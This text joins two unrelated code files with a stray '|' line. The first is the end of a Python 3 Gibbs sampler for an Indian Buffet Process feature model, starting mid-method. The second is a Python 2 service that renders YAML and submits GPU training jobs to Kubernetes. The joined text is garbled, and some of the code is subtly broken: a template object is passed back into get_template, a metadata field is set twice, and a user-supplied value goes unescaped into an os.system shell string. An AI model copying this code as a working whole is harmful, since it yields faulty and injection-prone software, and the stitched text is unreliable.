        for (ctr, i) in enumerate(order):
            # Periodically recompute the information form directly to limit
            # numerical drift from the incremental rank-one updates.
            if ctr % 5 == 0:
                for feat in self.feats:
                    feat.meanA, feat.covarA = feat.postA(self.Z)
                    feat.infoA = np.linalg.inv(feat.covarA)
                    feat.hA = feat.infoA @ feat.meanA
            # Get (z,x) for this data point
            zi = self.Z[i]
            # Remove this point from information
            for feat in self.feats:
                feat.update(self.Z[i], feat.X[i], sub=True)
                feat.covarA = np.linalg.inv(feat.infoA)
                feat.meanA = np.dot(feat.covarA, feat.hA)
            # Remove this data point from feature cts
            mi = self.m - self.Z[i]
            lpz = np.log(np.stack((self.N - mi, mi)))
            # Find all singleton features
            singletons = np.nonzero(mi <= 0)[0]
            # Sample for each non-singleton feature
            prev = np.copy(zi)
            for k in np.nonzero(mi > 0)[0]:
                zi[k] = 0
                lp0 = lpz[0, k] + sum(f.logPxi(zi, i) for f in self.feats)
                zi[k] = 1
                lp1 = lpz[1, k] + sum(f.logPxi(zi, i) for f in self.feats)
                zi[k] = int(np.random.uniform(0, 1) < expit(lp1 - lp0))
            self.m += zi - prev
            # Metropolis-Hastings step described in Meeds et al
            netk = poisson.rvs(self.alpha / self.N) - len(singletons)
            # Calculate the loglikelihoods
            lpold = sum(f.logPxi(zi, i) for f in self.feats)
            lpnew = sum(f.logPxi(zi, i, noise=netk * f.var_a) for f in self.feats)
            lpaccept = min(0.0, lpnew - lpold)
            lpreject = np.log(max(1.0 - np.exp(lpaccept), 1e-100))
            if np.random.uniform(0, 1) < expit(lpaccept - lpreject):
                if netk > 0:
                    # Grow Z/m and pad each view's information matrices.
                    self.Z = np.hstack((self.Z, np.zeros((self.N, netk))))
                    self.Z[i, self.K:] = 1
                    self.m = np.hstack((self.m, np.ones(netk)))
                    for feat in self.feats:
                        zero = np.zeros((self.K, netk))
                        feat.infoA = np.block([[feat.infoA, zero], [zero.T, np.eye(netk) / feat.var_a]])
                        feat.hA = np.vstack((feat.hA, np.zeros((netk, feat.D))))
                elif netk < 0:
                    # Retire -netk singleton features.
                    dead = singletons[:-netk]
                    self.Z = np.delete(self.Z, dead, axis=1)
                    self.m = np.delete(self.m, dead)
                    for feat in self.feats:
                        feat.infoA = np.delete(feat.infoA, dead, axis=0)
                        feat.infoA = np.delete(feat.infoA, dead, axis=1)
                        feat.hA = np.delete(feat.hA, dead, axis=0)
                self.K += netk
            # Restore this point's contribution to the information form.
            for feat in self.feats:
                feat.update(self.Z[i], feat.X[i])

    def logIBP(self):
        """ Calculate log P(Z|alpha) under the IBP prior """
        logp = self.K * np.log(self.alpha)
        # Multiplicity correction for identical columns (the Kh! terms).
        logp -= lnfact(np.unique(self.Z, axis=1, return_counts=True)[1]).sum()
        logp -= (self.alpha / np.arange(1, self.N + 1)).sum()
        # BUG FIX: lnfact is a module-level function; ``self.lnfact`` raised
        # AttributeError.
        facts = lnfact(self.N - self.m) + lnfact(self.m - 1) - lnfact(self.N)
        return logp + facts.sum()

    def predict(self, Xs):
        """Predict the last view for the query rows Xs using stored Z samples."""
        # BUG FIX: start from -inf; the log scores below are (almost) always
        # negative, so a 0 initializer left best_Z as None and crashed below.
        best = (-np.inf, None, None)
        for Z in self.Zs:
            m = Z.sum(axis=0) - Z
            lps = np.sum(np.log(np.where(Z == 1, m, self.N - m) / self.N), axis=1)
            for f, X in zip(self.feats[:-1], Xs[:-1]):
                X_bar = Z @ f.weights(Z)
                diffs = np.sum((X - X_bar) ** 2, axis=1) / (2 * f.var_x)
                lps -= diffs + np.log(2 * np.pi) / 2 + np.log(f.var_x) * f.D / 2
            i = np.argmax(lps)
            if lps[i] > best[0]:
                best = lps[i], Z, i
        best_lp, best_Z, best_i = best
        return self.feats[-1].weights(best_Z) @ best_Z[best_i]

    def run_sampler(self, iters=5000, burn_in=3000, thin=10):
        """Run the Gibbs chain, keeping thinned post-burn-in copies of Z."""
        self.Zs = []
        for i in tqdm_notebook(range(iters)):
            self.fullSample()
            print(self.K)
            if i > burn_in and i % thin == 0:
                self.Zs.append(np.copy(self.Z))
        return self.Zs
|
import json
import os
import time
import argparse
import uuid
import subprocess
import sys
import datetime
import copy
sys.path.append(os.path.join(os.path.dirname(os.path.abspath(__file__)),"../storage"))
sys.path.append(os.path.join(os.path.dirname(os.path.abspath(__file__)),"../utils"))
from jobs_tensorboard import GenTensorboardMeta
import k8sUtils
import joblog_manager
from osUtils import mkdirsAsUser
import yaml
from jinja2 import Environment, FileSystemLoader, Template
from config import config, GetStoragePath, GetWorkPath
from DataHandler import DataHandler
from node_manager import create_log
from node_manager import get_cluster_status
import base64
import re
import thread
import threading
import random
import logging
import logging.config
nvidiaDriverPath = config["nvidiaDriverPath"]
def printlog(msg):
    """Print msg to stdout prefixed with the current UTC date/time."""
    print "%s - %s" % (datetime.datetime.utcnow().strftime("%x %X"),msg)
def LoadJobParams(jobParamsJsonStr):
    """Decode a JSON-encoded job-parameter string into a Python object."""
    params = json.loads(jobParamsJsonStr)
    return params
def cmd_exec(cmdStr):
    """Run cmdStr through bash and return its stdout; empty string on failure."""
    try:
        output = subprocess.check_output(["bash","-c", cmdStr])
    except Exception as e:
        # Best-effort: log the failure and fall back to an empty result.
        print e
        output = ""
    return output
def SubmitJob(job):
    """Dispatch a job to the submitter matching its training type."""
    params = json.loads(base64.b64decode(job["jobParams"]))
    training_type = params["jobtrainingtype"]
    if training_type == "RegularJob":
        SubmitRegularJob(job)
    elif training_type == "PSDistJob":
        SubmitPSDistJob(job)
def CheckMountPoints(mplist, mp):
    """Return True when mp collides with no existing mount point.

    A collision is any existing entry that shares mp's name, container path,
    or host path. The whole list is scanned even after a collision is found,
    matching the original behavior.
    """
    ok = True
    for existing in mplist:
        if (existing["name"] == mp["name"]
                or existing["containerPath"] == mp["containerPath"]
                or existing["hostPath"] == mp["hostPath"]):
            ok = False
    return ok
def SubmitRegularJob(job):
    """Render a single-pod (or hyperparameter-sweep) job to YAML and submit it.

    Decodes the base64/JSON job parameters, validates the job/work paths,
    prepares the launch script and mount points, renders the Jinja template(s)
    and applies them with kubectl. Returns a dict with "output" and "jobId"
    on success, or with "error" after repeated failures.
    """
    ret = {}
    dataHandler = DataHandler()
    try:
        jobParams = json.loads(base64.b64decode(job["jobParams"]))
        jobParams["pvc_job"] = "jobs-" + jobParams["jobId"]
        jobParams["pvc_work"] = "work-" + jobParams["jobId"]
        jobParams["pvc_data"] = "storage-" + jobParams["jobId"]
        # Validate required storage paths before doing any work.
        if "jobPath" not in jobParams or len(jobParams["jobPath"].strip()) == 0:
            dataHandler.SetJobError(jobParams["jobId"],"ERROR: job-path does not exist")
            return False
        if "workPath" not in jobParams or len(jobParams["workPath"].strip()) == 0:
            dataHandler.SetJobError(jobParams["jobId"],"ERROR: work-path does not exist")
            return False
        #if "dataPath" not in jobParams or len(jobParams["dataPath"].strip()) == 0:
        #    dataHandler.SetJobError(jobParams["jobId"],"ERROR: data-path does not exist")
        #    return False
        jobPath,workPath,dataPath = GetStoragePath(jobParams["jobPath"],jobParams["workPath"],jobParams["dataPath"])
        # Create the job directory (and models subdir) owned by the submitting user.
        localJobPath = os.path.join(config["storage-mount-path"],jobPath)
        if not os.path.exists(localJobPath):
            if "userId" in jobParams:
                mkdirsAsUser(localJobPath,jobParams["userId"])
                mkdirsAsUser(os.path.join(localJobPath,"models"),jobParams["userId"])
            else:
                mkdirsAsUser(localJobPath,"0")
                mkdirsAsUser(os.path.join(localJobPath,"models"),"0")
        # Write the user's command into a launch script mounted at /job.
        jobParams["LaunchCMD"] = ""
        if "cmd" not in jobParams:
            jobParams["cmd"] = ""
        if isinstance(jobParams["cmd"], basestring) and not jobParams["cmd"] == "":
            launchScriptPath = os.path.join(localJobPath,"launch-%s.sh" % jobParams["jobId"])
            with open(launchScriptPath, 'w') as f:
                f.write("#!/bin/bash -x\n")
                f.write(jobParams["cmd"] + "\n")
                f.close()
            if "userId" in jobParams:
                os.system("chown -R %s %s" % (jobParams["userId"], launchScriptPath))
            jobParams["LaunchCMD"] = "[\"bash\", \"/job/launch-%s.sh\"]" % jobParams["jobId"]
        jobParams["jobDescriptionPath"] = "jobfiles/" + time.strftime("%y%m%d") + "/" + jobParams["jobId"] + "/" + jobParams["jobId"] + ".yaml"
        # Labels must be alphanumeric for Kubernetes.
        jobParams["jobNameLabel"] = ''.join(e for e in jobParams["jobName"] if e.isalnum())
        ENV = Environment(loader=FileSystemLoader("/"))
        jobTempDir = os.path.join(config["root-path"],"Jobs_Templete")
        jobTemp = os.path.join(jobTempDir, "RegularJob.yaml.template")
        jobParams["hostjobPath"] = os.path.join(config["storage-mount-path"], jobPath)
        jobParams["hostworkPath"] = os.path.join(config["storage-mount-path"], workPath)
        jobParams["hostdataPath"] = os.path.join(config["storage-mount-path"], dataPath)
        jobParams["nvidiaDriverPath"] = nvidiaDriverPath
        jobParams["userNameLabel"] = getAlias(jobParams["userName"])
        jobParams["rest-api"] = config["rest-api"]
        # Normalize user mounts, then add the standard mounts unless the user
        # already declared a conflicting one.
        if "mountpoints" not in jobParams:
            jobParams["mountpoints"] = []
        for onemount in jobParams["mountpoints"]:
            onemount["name"] = onemount["containerPath"].replace("/","")
        mp = {"name":"nvidia-driver","containerPath":"/usr/local/nvidia","hostPath":nvidiaDriverPath, "enabled":True}
        if CheckMountPoints(jobParams["mountpoints"],mp):
            jobParams["mountpoints"].append(mp)
        mp = {"name":"job","containerPath":"/job","hostPath":jobParams["hostjobPath"], "enabled":True}
        if CheckMountPoints(jobParams["mountpoints"],mp):
            jobParams["mountpoints"].append(mp)
        mp = {"name":"work","containerPath":"/work","hostPath":jobParams["hostworkPath"], "enabled":True}
        if CheckMountPoints(jobParams["mountpoints"],mp):
            jobParams["mountpoints"].append(mp)
        mp = {"name":"data","containerPath":"/data","hostPath":jobParams["hostdataPath"], "enabled":True}
        if CheckMountPoints(jobParams["mountpoints"],mp):
            jobParams["mountpoints"].append(mp)
        userAlias = getAlias(jobParams["userName"])
        mp = {"name":"sshkey","containerPath":"/home/%s/.ssh" % userAlias,"hostPath":os.path.join(config["storage-mount-path"], GetWorkPath(userAlias)+"/.ssh"), "readOnly":True, "enabled":True}
        if CheckMountPoints(jobParams["mountpoints"],mp):
            jobParams["mountpoints"].append(mp)
        jobParams["pod_ip_range"] = config["pod_ip_range"]
        if "usefreeflow" in config:
            jobParams["usefreeflow"] = config["usefreeflow"]
        else:
            jobParams["usefreeflow"] = False
        print ("Render Job: %s" % jobParams)
        jobDescriptionList = []
        # One pod per hyperparameter value when a sweep is requested,
        # otherwise a single pod named after the job id.
        pods = []
        if "hyperparametername" in jobParams and "hyperparameterstartvalue" in jobParams and "hyperparameterendvalue" in jobParams and "hyperparameterstep" in jobParams:
            i = int(jobParams["hyperparameterstartvalue"])
            end = int(jobParams["hyperparameterendvalue"])
            step = int(jobParams["hyperparameterstep"])
            c = 0
            while (i <= end):
                pod = {}
                pod["podName"] = jobParams["jobId"]+"-pod-"+str(c)
                pod["envs"] = [{"name":jobParams["hyperparametername"],"value":i}]
                i += step
                c += 1
                pods.append(pod)
        else:
            pod = {}
            pod["podName"] = jobParams["jobId"]
            pod["envs"] = []
            pods.append(pod)
        if "env" not in jobParams:
            jobParams["env"] = []
        # Keep the shared env separate so per-pod envs can be appended per pod.
        jobParams["commonenv"] = copy.copy(jobParams["env"])
        for pod in pods:
            jobParams["podName"] = pod["podName"]
            jobParams["env"] = jobParams["commonenv"] + pod["envs"]
            if "kube_custom_scheduler" in config and config["kube_custom_scheduler"]:
                # Express GPU requests as a DeviceInformation annotation for
                # the custom scheduler instead of a plain resource request.
                container = {}
                container["requests"] = {"alpha.gpu/numgpu" : jobParams["resourcegpu"]}
                podInfo = {}
                podInfo["podname"] = jobParams["podName"]
                if "useGPUTopology" in jobParams and jobParams["useGPUTopology"]:
                    # add topology constraints explicitly - for testing
                    # if (jobParams["resourcegpu"] >= 2):
                    #     # both cards in same inner group
                    #     container["requests"]["alpha/grpresource/gpugrp1/0/gpugrp0/0/gpu/0/cards"] = 1
                    #     container["requests"]["alpha/grpresource/gpugrp1/0/gpugrp0/0/gpu/1/cards"] = 1
                    # if (jobParams["resourcegpu"] >= 3):
                    #     container["requests"]["alpha/grpresource/gpugrp1/0/gpugrp0/1/gpu/2/cards"] = 1
                    # if (jobParams["resourcegpu"] >= 4):
                    #     container["requests"]["alpha/grpresource/gpugrp1/0/gpugrp0/1/gpu/3/cards"] = 1
                    # if (jobParams["resourcegpu"] >= 5):
                    #     container["requests"]["alpha/grpresource/gpugrp1/1/gpugrp0/2/gpu/4/cards"] = 1
                    # if (jobParams["resourcegpu"] >= 6):
                    #     container["requests"]["alpha/grpresource/gpugrp1/1/gpugrp0/2/gpu/5/cards"] = 1
                    # if (jobParams["resourcegpu"] >= 7):
                    #     container["requests"]["alpha/grpresource/gpugrp1/1/gpugrp0/3/gpu/6/cards"] = 1
                    # if (jobParams["resourcegpu"] >= 8):
                    #     container["requests"]["alpha/grpresource/gpugrp1/1/gpugrp0/3/gpu/7/cards"] = 1
                    podInfo["requests"] = {"alpha.gpu/gpu-generate-topology" : 1}
                else:
                    # for cases when desired topology is explictly given or not desired
                    podInfo["requests"] = {"alpha.gpu/gpu-generate-topology" : 0}
                podInfo["runningcontainer"] = {jobParams["podName"] : container}
                if "annotations" not in jobParams:
                    jobParams["annotations"] = {}
                jobParams["annotations"]["pod.alpha/DeviceInformation"] = "'" + json.dumps(podInfo) + "'"
                jobParams["resourcegpu"] = 0 # gpu requests specified through annotation
            template = ENV.get_template(os.path.abspath(jobTemp))
            job_description = template.render(job=jobParams)
            jobDescriptionList.append(job_description)
            # Render one Kubernetes service per requested interactive port.
            if ("interactivePort" in jobParams and len(jobParams["interactivePort"].strip()) > 0):
                ports = [p.strip() for p in re.split(",|;",jobParams["interactivePort"]) if len(p.strip()) > 0 and p.strip().isdigit()]
                for portNum in ports:
                    jobParams["serviceId"] = "interactive-" + jobParams["podName"] + "-" + portNum
                    jobParams["port"] = portNum
                    jobParams["port-name"] = "interactive"
                    jobParams["port-type"] = "TCP"
                    serviceTemplate = ENV.get_template(os.path.join(jobTempDir,"KubeSvc.yaml.template"))
                    stemplate = ENV.get_template(serviceTemplate)
                    interactiveMeta = stemplate.render(svc=jobParams)
                    jobDescriptionList.append(interactiveMeta)
        # Join all rendered documents into one multi-document YAML file.
        jobDescription = "\n---\n".join(jobDescriptionList)
        jobDescriptionPath = os.path.join(config["storage-mount-path"], jobParams["jobDescriptionPath"])
        if not os.path.exists(os.path.dirname(os.path.realpath(jobDescriptionPath))):
            os.makedirs(os.path.dirname(os.path.realpath(jobDescriptionPath)))
        # Remove any previous deployment of this job before re-creating it.
        if os.path.isfile(jobDescriptionPath):
            output = k8sUtils.kubectl_delete(jobDescriptionPath)
        with open(jobDescriptionPath, 'w') as f:
            f.write(jobDescription)
        output = k8sUtils.kubectl_create(jobDescriptionPath)
        logging.info("Submitted job %s to k8s, returned with status %s" %(job["jobId"], output))
        ret["output"] = output
        ret["jobId"] = jobParams["jobId"]
        if "userName" not in jobParams:
            jobParams["userName"] = ""
        # Persist the scheduling state and metadata for later status updates.
        dataHandler.UpdateJobTextField(jobParams["jobId"],"jobStatus","scheduling")
        dataHandler.UpdateJobTextField(jobParams["jobId"],"jobDescriptionPath",jobParams["jobDescriptionPath"])
        dataHandler.UpdateJobTextField(jobParams["jobId"],"jobDescription",base64.b64encode(jobDescription))
        jobMeta = {}
        jobMeta["jobDescriptionPath"] = jobParams["jobDescriptionPath"]
        jobMeta["jobPath"] = jobParams["jobPath"]
        jobMeta["workPath"] = jobParams["workPath"]
        jobMeta["jobPath"] = jobParams["jobPath"]
        jobMeta["LaunchCMD"] = jobParams["LaunchCMD"]
        jobMetaStr = base64.b64encode(json.dumps(jobMeta))
        dataHandler.UpdateJobTextField(jobParams["jobId"],"jobMeta",jobMetaStr)
    except Exception as e:
        # After 5 failed submissions, give up and mark the job as errored.
        print e
        ret["error"] = str(e)
        retries = dataHandler.AddandGetJobRetries(jobParams["jobId"])
        if retries >= 5:
            dataHandler.UpdateJobTextField(jobParams["jobId"],"jobStatus","error")
            dataHandler.UpdateJobTextField(jobParams["jobId"],"errorMsg","Cannot submit job!" + str(e))
    return ret
def SubmitPSDistJob(job):
    """Render and submit a parameter-server distributed training job.

    Creates one pod spec per ps/worker replica (each with its own job
    sub-directory and launch script), joins them into one YAML document and
    applies it with kubectl. Returns a dict with "output" and "jobId" on
    success, or with "error" after repeated failures.
    """
    ret = {}
    dataHandler = DataHandler()
    try:
        jobParams = json.loads(base64.b64decode(job["jobParams"]))
        jobParams["rest-api"] = config["rest-api"]
        distJobParams = {}
        distJobParams["ps"] = []
        distJobParams["worker"] = []
        # Pin all replicas of this job to one randomly chosen rack, if any.
        assignedRack = None
        if len(config["racks"]) > 0:
            assignedRack = random.choice(config["racks"])
        if jobParams["jobtrainingtype"] == "PSDistJob":
            jobDescriptionList = []
            nums = {"ps":int(jobParams["numps"]),"worker":int(jobParams["numpsworker"])}
            for role in ["ps","worker"]:
                for i in range(nums[role]):
                    # Each replica gets an independent copy of the parameters.
                    distJobParam=copy.deepcopy(jobParams)
                    distJobParam["distId"] = "%s%d" % (role,i)
                    distJobParam["distRole"] = role
                    if "jobPath" not in distJobParam or len(distJobParam["jobPath"].strip()) == 0:
                        dataHandler.SetJobError(distJobParam["jobId"],"ERROR: job-path does not exist")
                        return False
                    distJobParam["distJobPath"] = os.path.join(distJobParam["jobPath"],distJobParam["distId"])
                    if "workPath" not in distJobParam or len(distJobParam["workPath"].strip()) == 0:
                        dataHandler.SetJobError(distJobParam["jobId"],"ERROR: work-path does not exist")
                        return False
                    if "dataPath" not in distJobParam or len(distJobParam["dataPath"].strip()) == 0:
                        dataHandler.SetJobError(distJobParam["jobId"],"ERROR: data-path does not exist")
                        return False
                    jobPath,workPath,dataPath = GetStoragePath(distJobParam["distJobPath"],distJobParam["workPath"],distJobParam["dataPath"])
                    localJobPath = os.path.join(config["storage-mount-path"],jobPath)
                    if not os.path.exists(localJobPath):
                        if "userId" in distJobParam:
                            mkdirsAsUser(localJobPath,distJobParam["userId"])
                        else:
                            mkdirsAsUser(localJobPath,0)
                    distJobParam["LaunchCMD"] = ""
                    if "cmd" not in distJobParam:
                        distJobParam["cmd"] = ""
                    ################One choice is that we only wait for certain time.
                    # launchCMD = """
                    ##!/bin/bash
                    #mkdir -p /opt
                    #echo "[DLWorkspace System]: Waiting for all containers are ready..."
                    ## wait for at most 10 mins.
                    #for i in {1..200}; do
                    #    if [ ! -f /opt/run_dist_job ] || [ ! -f /opt/run_dist_job.sh ]; then
                    #        sleep 3
                    #    else
                    #        break
                    #    fi
                    #done
                    #if [ ! -f /opt/run_dist_job ] || [ ! -f /opt/run_dist_job.sh ]; then
                    #    echo "[DLWorkspace System]: Waiting for containers: timeout! Restarting..."
                    #    exit 1
                    #else
                    #    echo "[DLWorkspace System]: All containers are ready, launching training job..."
                    #    chmod +x /opt/run_dist_job.sh
                    #    /opt/run_dist_job.sh
                    #fi
                    #"""
                    # The launch script blocks until the dist-job bootstrap
                    # files have been pushed into the container, then runs them.
                    launchCMD = """
#!/bin/bash
mkdir -p /opt
echo "[DLWorkspace System]: Waiting for all containers are ready..."
while [ ! -f /opt/run_dist_job ] || [ ! -f /opt/run_dist_job.sh ]; do
sleep 3
done
echo "[DLWorkspace System]: All containers are ready, launching training job..."
chmod +x /opt/run_dist_job.sh
/opt/run_dist_job.sh
"""
                    launchScriptPath = os.path.join(localJobPath,"launch-%s.sh" % distJobParam["jobId"])
                    with open(launchScriptPath, 'w') as f:
                        f.write(launchCMD)
                        f.close()
                    distJobParam["LaunchCMD"] = "[\"bash\", \"/job/launch-%s.sh\"]" % distJobParam["jobId"]
                    # Labels must be alphanumeric for Kubernetes.
                    distJobParam["jobNameLabel"] = ''.join(e for e in distJobParam["jobName"] if e.isalnum())
                    distJobParam["userNameLabel"] = getAlias(jobParams["userName"])
                    ENV = Environment(loader=FileSystemLoader("/"))
                    jobTempDir = os.path.join(config["root-path"],"Jobs_Templete")
                    jobTemp = os.path.join(jobTempDir, "DistJob.yaml.template")
                    distJobParam["hostjobPath"] = os.path.join(config["storage-mount-path"], jobPath)
                    distJobParam["hostworkPath"] = os.path.join(config["storage-mount-path"], workPath)
                    distJobParam["hostdataPath"] = os.path.join(config["storage-mount-path"], dataPath)
                    distJobParam["nvidiaDriverPath"] = nvidiaDriverPath
                    if "mountpoints" not in distJobParam:
                        distJobParam["mountpoints"] = []
                    distJobParam["mountpoints"].append({"name":"nvidia-driver","containerPath":"/usr/local/nvidia","hostPath":nvidiaDriverPath})
                    distJobParam["mountpoints"].append({"name":"job","containerPath":"/job","hostPath":distJobParam["hostjobPath"]})
                    distJobParam["mountpoints"].append({"name":"work","containerPath":"/work","hostPath":distJobParam["hostworkPath"]})
                    distJobParam["mountpoints"].append({"name":"data","containerPath":"/data","hostPath":distJobParam["hostdataPath"]})
                    distJobParam["pod_ip_range"] = config["pod_ip_range"]
                    if "usefreeflow" in config and config["usefreeflow"] == "True":
                        distJobParam["usefreeflow"] = config["usefreeflow"]
                    else:
                        distJobParam["usefreeflow"] = False
                    # Pick a pseudo-random container port in [3000, 4000).
                    random.seed(datetime.datetime.now())
                    distJobParam["containerPort"] = int(random.random()*1000+3000)
                    if assignedRack is not None:
                        if "nodeSelector" not in distJobParam:
                            distJobParam["nodeSelector"] = {}
                        distJobParam["nodeSelector"]["rack"] = assignedRack
                    template = ENV.get_template(os.path.abspath(jobTemp))
                    job_description = template.render(job=distJobParam)
                    jobDescriptionList.append(job_description)
                    distJobParams[role].append(distJobParam)
        jobParams["jobDescriptionPath"] = "jobfiles/" + time.strftime("%y%m%d") + "/" + jobParams["jobId"] + "/" + jobParams["jobId"] + ".yaml"
        # Join all replica documents into one multi-document YAML file.
        jobDescription = "\n---\n".join(jobDescriptionList)
        jobDescriptionPath = os.path.join(config["storage-mount-path"], jobParams["jobDescriptionPath"])
        if not os.path.exists(os.path.dirname(os.path.realpath(jobDescriptionPath))):
            os.makedirs(os.path.dirname(os.path.realpath(jobDescriptionPath)))
        # Remove any previous deployment of this job before re-creating it.
        if os.path.isfile(jobDescriptionPath):
            output = k8sUtils.kubectl_delete(jobDescriptionPath)
        with open(jobDescriptionPath, 'w') as f:
            f.write(jobDescription)
        output = k8sUtils.kubectl_create(jobDescriptionPath)
        ret["output"] = output
        ret["jobId"] = jobParams["jobId"]
        if "userName" not in jobParams:
            jobParams["userName"] = ""
        # Persist the scheduling state and metadata for later status updates.
        dataHandler.UpdateJobTextField(jobParams["jobId"],"jobStatus","scheduling")
        dataHandler.UpdateJobTextField(jobParams["jobId"],"jobDescriptionPath",jobParams["jobDescriptionPath"])
        dataHandler.UpdateJobTextField(jobParams["jobId"],"jobDescription",base64.b64encode(jobDescription))
        jobMeta = {}
        jobMeta["jobDescriptionPath"] = jobParams["jobDescriptionPath"]
        jobMeta["jobPath"] = jobParams["jobPath"]
        jobMeta["workPath"] = jobParams["workPath"]
        jobMeta["jobPath"] = jobParams["jobPath"]
        jobMeta["LaunchCMD"] = jobParams["LaunchCMD"]
        jobMeta["distJobParams"] = distJobParams
        jobMetaStr = base64.b64encode(json.dumps(jobMeta))
        dataHandler.UpdateJobTextField(jobParams["jobId"],"jobMeta",jobMetaStr)
    except Exception as e:
        # After 5 failed submissions, give up and mark the job as errored.
        print e
        ret["error"] = str(e)
        retries = dataHandler.AddandGetJobRetries(jobParams["jobId"])
        if retries >= 5:
            dataHandler.UpdateJobTextField(jobParams["jobId"],"jobStatus","error")
            dataHandler.UpdateJobTextField(jobParams["jobId"],"errorMsg","Cannot submit job!" + str(e))
    return ret
def KillJob(job):
    """Delete a job's Kubernetes resources and record its final status.

    Returns True when the job's description file existed and kubectl delete
    succeeded; otherwise records an error message, marks the job as errored
    and returns False.
    """
    dataHandler = DataHandler()
    # Capture the job's last-known status detail before tearing it down.
    result, detail = k8sUtils.GetJobStatus(job["jobId"])
    dataHandler.UpdateJobTextField(job["jobId"],"jobStatusDetail",base64.b64encode(json.dumps(detail)))
    logging.info("Killing job %s, with status %s, %s" %(job["jobId"], result,detail))
    if "jobDescriptionPath" in job and job["jobDescriptionPath"] is not None:
        jobDescriptionPath = os.path.join(config["storage-mount-path"], job["jobDescriptionPath"])
        if os.path.isfile(jobDescriptionPath):
            # A zero return value from kubectl_delete is treated as success.
            if k8sUtils.kubectl_delete(jobDescriptionPath) == 0:
                dataHandler.UpdateJobTextField(job["jobId"],"jobStatus","killed")
                return True
            else:
                dataHandler.UpdateJobTextField(job["jobId"],"errorMsg","Cannot delete job from Kubernetes Cluster!")
        else:
            dataHandler.UpdateJobTextField(job["jobId"],"errorMsg","Cannot find job description file!")
    # Fall-through: deletion failed or no description file was recorded.
    dataHandler.UpdateJobTextField(job["jobId"],"jobStatus","error")
    return False
def getAlias(username):
    """Reduce a user principal to its short alias.

    Drops an e-mail domain ("alice@corp.com" -> "alice"), then keeps the
    second path component of a slash-qualified name ("CORP/alice" -> "alice").
    """
    alias = username
    at_pos = alias.find("@")
    if at_pos != -1:
        alias = alias[:at_pos].strip()
    if "/" in alias:
        alias = alias.split("/")[1].strip()
    return alias
def ApproveJob(job):
    """Mark *job* as approved in the job database; always returns True."""
    handler = DataHandler()
    handler.ApproveJob(job["jobId"])
    handler.Close()
    return True
def AutoApproveJob(job):
    # Auto-approve small jobs: approve when the user currently holds no GPUs,
    # or when this job would keep the user's total at 4 GPUs or fewer.
    cluster_status = get_cluster_status()
    jobUser = getAlias(job["userName"])
    jobParams = json.loads(base64.b64decode(job["jobParams"]))
    jobGPU = int(jobParams["resourcegpu"])
    currentGPU = 0
    for user in cluster_status["user_status"]:
        if user["userName"] == jobUser:
            # NOTE(review): no break -- if the user appears more than once in
            # user_status, the last matching entry wins.
            currentGPU = int(user["userGPU"])
    if currentGPU == 0 or currentGPU + jobGPU <= 4:
        ApproveJob(job)
# Jobs whose Kubernetes status came back "Unknown", mapped to the time the
# unusual state was first seen (drives the 300-second grace period below).
UnusualJobs = {}
def UpdateJobStatus(job):
    # Poll Kubernetes for the job's current state and mirror it into the DB.
    # Handles the lifecycle states Succeeded / Running / Failed / Unknown /
    # PendingHostPort; cleans up or re-submits as needed.
    dataHandler = DataHandler()
    jobParams = json.loads(base64.b64decode(job["jobParams"]))
    if job["jobStatus"] == "scheduling" and jobParams["jobtrainingtype"] == "PSDistJob":
        # Distributed PS jobs need their ps/worker pods wired together first.
        launch_ps_dist_job(jobParams)
    jobPath,workPath,dataPath = GetStoragePath(jobParams["jobPath"],jobParams["workPath"],jobParams["dataPath"])
    localJobPath = os.path.join(config["storage-mount-path"],jobPath)
    logPath = os.path.join(localJobPath,"logs/joblog.txt")
    result, detail = k8sUtils.GetJobStatus(job["jobId"])
    dataHandler.UpdateJobTextField(job["jobId"],"jobStatusDetail",base64.b64encode(json.dumps(detail)))
    logging.info("job %s status: %s,%s" % (job["jobId"], result, json.dumps(detail)))
    jobDescriptionPath = os.path.join(config["storage-mount-path"], job["jobDescriptionPath"]) if "jobDescriptionPath" in job else None
    if "userId" not in jobParams:
        jobParams["userId"] = "0"
    if result.strip() == "Succeeded":
        joblog_manager.extract_job_log(job["jobId"],logPath,jobParams["userId"])
        dataHandler.UpdateJobTextField(job["jobId"],"jobStatus","finished")
        if jobDescriptionPath is not None and os.path.isfile(jobDescriptionPath):
            k8sUtils.kubectl_delete(jobDescriptionPath)
    elif result.strip() == "Running":
        if job["jobStatus"] != "running":
            dataHandler.UpdateJobTextField(job["jobId"],"jobStatus","running")
        if "interactivePort" in jobParams:
            # Publish service endpoints for interactive jobs.
            serviceAddress = k8sUtils.GetServiceAddress(job["jobId"])
            serviceAddress = base64.b64encode(json.dumps(serviceAddress))
            dataHandler.UpdateJobTextField(job["jobId"],"endpoints",serviceAddress)
    elif result.strip() == "Failed":
        printlog("Job %s fails, cleaning..." % job["jobId"])
        joblog_manager.extract_job_log(job["jobId"],logPath,jobParams["userId"])
        dataHandler.UpdateJobTextField(job["jobId"],"jobStatus","failed")
        dataHandler.UpdateJobTextField(job["jobId"],"errorMsg",detail)
        if jobDescriptionPath is not None and os.path.isfile(jobDescriptionPath):
            k8sUtils.kubectl_delete(jobDescriptionPath)
    elif result.strip() == "Unknown":
        # Give an "Unknown" job a 300-second grace period before acting.
        if job["jobId"] not in UnusualJobs:
            UnusualJobs[job["jobId"]] = datetime.datetime.now()
        elif (datetime.datetime.now() - UnusualJobs[job["jobId"]]).seconds > 300:
            del UnusualJobs[job["jobId"]]
            retries = dataHandler.AddandGetJobRetries(job["jobId"])
            if retries >= 5:
                printlog("Job %s fails for more than 5 times, abort" % job["jobId"])
                dataHandler.UpdateJobTextField(job["jobId"],"jobStatus","error")
                dataHandler.UpdateJobTextField(job["jobId"],"errorMsg","cannot launch the job.")
                if jobDescriptionPath is not None and os.path.isfile(jobDescriptionPath):
                    k8sUtils.kubectl_delete(jobDescriptionPath)
            else:
                printlog("Job %s fails in Kubernetes, delete and re-submit the job. Retries %d" % (job["jobId"] , retries))
                SubmitJob(job)
    elif result.strip() == "PendingHostPort":
        printlog("Cannot find host ports for job :%s, re-launch the job with different host ports " % (job["jobId"]))
        SubmitJob(job)
    if result.strip() != "Unknown" and job["jobId"] in UnusualJobs:
        del UnusualJobs[job["jobId"]]
def UpdateDistJobStatus(job):
    # Poll and persist the status of a PS distributed job.
    # Mirrors UpdateJobStatus, but first verifies that the expected number of
    # ps/worker pods exist (launching the distributed wiring while the job is
    # still scheduling), then advances the job through the Succeeded /
    # Running / Failed / Unknown handling using GetDistJobStatus.
    dataHandler = DataHandler()
    jobParams = json.loads(base64.b64decode(job["jobParams"]))
